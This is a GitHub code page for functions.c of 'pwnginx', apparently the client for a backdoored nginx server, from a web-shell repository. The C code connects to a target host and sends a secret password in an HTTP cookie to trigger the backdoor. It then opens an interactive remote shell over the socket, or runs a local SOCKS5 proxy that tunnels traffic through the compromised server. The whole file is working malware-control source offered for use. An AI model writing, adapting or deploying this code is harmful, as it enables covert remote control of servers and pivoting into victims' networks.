forked from xl7dev/WebShell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfunctions.c
185 lines (168 loc) · 4.54 KB
/
functions.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
/*
* functions.c - pwnginx functions
* openwill.me / www.hackshell.net
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <bits/signum.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <pthread.h>
extern char *ip;
extern char *port;
extern char *password;
extern char *socks5ip;
extern char *socks5port;
int full_send(int fd,void *buf,int size)
{
int ret,total=0;
while(size){
ret=send(fd, buf, size,0);
total+=ret;
if(ret<0) return ret;
size=size-ret;
buf+=ret;
}
return total;
}
int full_recv(int fd,void *buf,int size)
{
int ret,total=0;
while(size){
ret=recv(fd, buf, size,0);
total+=ret;
if(ret<=0) return ret;
size=size-ret;
buf+=ret;
}
return total;
}
int init_connection(char *ip,char *port,int function)
{
int server;
struct sockaddr_in server_addr;
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = inet_addr(ip);
server_addr.sin_port = htons(atoi(port));
server = socket( AF_INET, SOCK_STREAM, 0 );
if(connect( server, (struct sockaddr *) &server_addr,sizeof( server_addr ) )<0){
perror("[E] Connect failed");
return 1;
}
char *buf = malloc(100);
memset(buf,0,100);
sprintf(buf,"GET / HTTP/1.1\r\nHost: %s\r\nCookie: pwnginx=%s; action=%d\r\n\r\n", ip, password, function);
full_send(server,buf,strlen(buf));
full_recv(server,buf,9);
if(strncmp(buf,"pwnginx",7)!=0){
printf("[E] Cannot get banner\n");
close(server);
server = -1;
}
free(buf);
return server;
}
int forwarder(int from,int to)
{
int rec,sen;
fd_set rfds;
char buffer[BUFSIZ+1];
while(1){
FD_ZERO(&rfds);
FD_SET(from, &rfds);
FD_SET(to, &rfds);
int bigger = (from>to?from:to)+1;
if(select(bigger, &rfds, NULL, NULL, NULL)==0)
continue;
if(FD_ISSET(from,&rfds)){
if ((rec = read(from, buffer, BUFSIZ)) > 0){
sen=write(to, &buffer, rec);
//printf("%d => %d\n",rec,sen);
if(sen<=0) {
//printf("::1::%d::\n",sen);
break;
}
}
else {
//printf("::2::%d::\n",rec);
break;
}
}
if(FD_ISSET(to,&rfds)){
if ((rec = read(to, buffer, BUFSIZ)) > 0){
sen=write(from, &buffer, rec);
//printf("%d <= %d\n",rec,sen);
if(sen<=0) {
//printf("::3::%d::\n",sen);
break;
}
}
else {
//printf("::4::%d::\n",rec);
break;
}
}
}
return 0;
}
int exec_shell(int fd)
{
printf("\n\n[i] Enjoy the real world.\n");
forwarder(STDIN_FILENO,fd);
close(fd);
printf("Connection lost\n");
return 0;
}
int socks5_worker(void *fdptr)
{
int fd = *(int *)fdptr;
int srv_fd = init_connection(ip,port,2);
if(srv_fd<0){
printf("[E] init_connection failed\n");
return -1;
}
forwarder(fd,srv_fd);
close(fd);
close(srv_fd);
printf("Connection lost\n");
return 0;
}
int exec_socks5()
{
int sock,csock;
struct sockaddr_in saddr,caddr;
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = inet_addr(socks5ip);
saddr.sin_port = htons(atoi(socks5port));
sock = socket(AF_INET, SOCK_STREAM, 0);
int reuse = 1;
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(int));
if(bind(sock, (struct sockaddr *) &saddr, sizeof(saddr))==-1){
perror("[E] bind error");
return -1;
}
listen(sock, 5);
int caddr_len=sizeof(caddr);
printf("[i] Listenning port %d on %s\n",ntohs(saddr.sin_port),inet_ntoa(saddr.sin_addr));
while((csock = accept(sock,(struct sockaddr *) &caddr,(socklen_t * __restrict__)&caddr_len))){
printf("[i] Connected from %s\n", inet_ntoa(caddr.sin_addr));
pthread_t thread;
if(pthread_create(&thread, NULL, (void *)socks5_worker, (void *)&csock))
{
perror("[E] pthread_create failed");
close(sock);
}
else
pthread_detach(thread);
}
return 0;
}